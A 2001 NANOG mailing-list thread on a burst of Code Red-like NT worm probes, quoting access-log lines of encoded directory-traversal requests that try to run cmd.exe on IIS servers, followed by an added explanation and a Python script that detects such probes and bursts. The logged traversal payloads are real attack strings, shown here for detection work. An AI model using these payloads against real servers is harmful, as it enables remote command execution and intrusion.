[42663] in North American Network Operators' Group


RE: Worm probes

daemon@ATHENA.MIT.EDU (Don Lundquist)
Tue Sep 18 17:28:24 2001

Date: Tue, 18 Sep 2001 10:23:50 -0400
Message-ID: <3ADEEE9B86133B40B083CF72F8B04AC82B5ADF@PEAKCLTNTS03.peak-10.com>
From: "Don Lundquist" <don.lundquist@peak-10.com>
To: <nanog@merit.edu>
Errors-To: owner-nanog-outgoing@merit.edu


Same here....

a lot of activity..... seems to be a pattern closely resembling Code Red....

- - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
- - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
- - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
- - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
- - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
- - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
- - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
- - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"

Don

-----Original Message-----
From: sigma@pair.com [mailto:sigma@pair.com]
Sent: Tuesday, September 18, 2001 9:55 AM
To: nanog@merit.edu
Subject: Worm probes

Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
probes this morning?  We're seeing about 8000/second, starting around
9:15 Eastern time, to and from a wide variety of addresses.

Is CodeRed or one of its relatives scheduled to start sweeping again
today?  We've never seen this level of traffic related to the NT worms.
Even though we don't run any NT at all, we still have to suffer :(

Kevin
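The eight requests in Don's excerpt are all the same probe against the
/scripts/ directory, written eight different ways: four use an overlong
two-byte UTF-8 encoding of the path separator (%c0%af, %c0%2f, %c1%9c,
%c1%1c) and four encode the '%' itself so that the separator only appears
after a second round of URL decoding (%%35%63, %%35c, %25%35%63, %252f). A
filter that decodes once and looks for "../" catches none of them. The
script below is an added example, not code from this message or from the
NANOG list: it parses Apache-style access log lines, decodes each request
path up to twice while folding 0xC0/0xC1-led byte pairs to the ASCII value
they encode (a modelling choice made so that all four overlong variants
collapse to a separator; it is not a description of any particular
server's decoder), flags any decoded form that contains a ".." segment,
and reports per-source, per-second bursts of the kind Kevin describes.
The sample log is constructed from the excerpt with a placeholder client
address (203.0.113.7), since the archive stripped the real addresses.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample in Apache combined format, modelled on the excerpt above.
# 203.0.113.7 is a documentation (TEST-NET-3) placeholder, not a real client.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:57 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:58 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:28:59 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:29:03 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Apache common/combined log line: host ident user [timestamp] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def lenient_decode(raw: str, rounds: int = 2) -> list:
    """Percent-decode `raw` up to `rounds` times and return every intermediate form.

    Differs from a single unquote() in two ways:
      * decoding repeats, so a double-encoded separator such as %252f
        (-> %2f -> '/') only shows up on the second pass;
      * a byte pair led by 0xC0 or 0xC1 (an overlong two-byte UTF-8 form) is
        folded to the 7-bit value it encodes without checking that the second
        byte is a valid continuation byte, so %c0%af, %c0%2f, %c1%9c and
        %c1%1c all collapse to '/' or '\\'.  This leniency is a detection
        modelling choice, not a description of any server's decoder.
    """
    forms = []
    current = raw
    for _ in range(rounds):
        data = unquote_to_bytes(current)  # invalid %xx sequences are left as-is
        out = bytearray()
        i = 0
        while i < len(data):
            b = data[i]
            if b in (0xC0, 0xC1) and i + 1 < len(data):
                out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
                i += 2
            else:
                out.append(b)
                i += 1
        current = out.decode('latin-1')  # never fails, keeps one char per byte
        forms.append(current)
        if '%' not in current:
            break  # nothing left to decode
    return forms


def has_traversal(path: str) -> bool:
    """True when any decoded form of `path` contains a '..' directory segment."""
    for form in lenient_decode(path):
        segments = form.replace('\\', '/').split('/')
        if '..' in segments:
            return True
    return False


def scan_log(text: str, burst_threshold: int = 3) -> dict:
    """Flag traversal probes in Apache-style log text and find per-second bursts.

    Returns {'probes': [(host, ts, path, status), ...],
             'bursts': {(host, ts): count, ...},   # count >= burst_threshold
             'unparsed': number of lines the regex did not match}
    """
    probes = []
    per_second = Counter()
    unparsed = 0
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        if has_traversal(m['path']):
            probes.append((m['host'], m['ts'], m['path'], m['status']))
            per_second[(m['host'], m['ts'])] += 1
    bursts = {key: n for key, n in per_second.items() if n >= burst_threshold}
    return {'probes': probes, 'bursts': bursts, 'unparsed': unparsed}


if __name__ == '__main__':
    report = scan_log(SAMPLE_LOG)
    for host, ts, path, status in report['probes']:
        print(f'{host} {ts} {status} {path}')
    for (host, ts), n in sorted(report['bursts'].items()):
        print(f'burst: {n} probes from {host} at {ts}')
```

The burst threshold is deliberately low for the nine-line sample; on a
real feed it would be set from the normal per-source request rate. Note
that the 404 and 400 responses in the excerpt show the requests failing on
a non-IIS server, so this is a visibility and rate-tracking aid for
the kind of background noise Kevin describes, not a blocking control.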
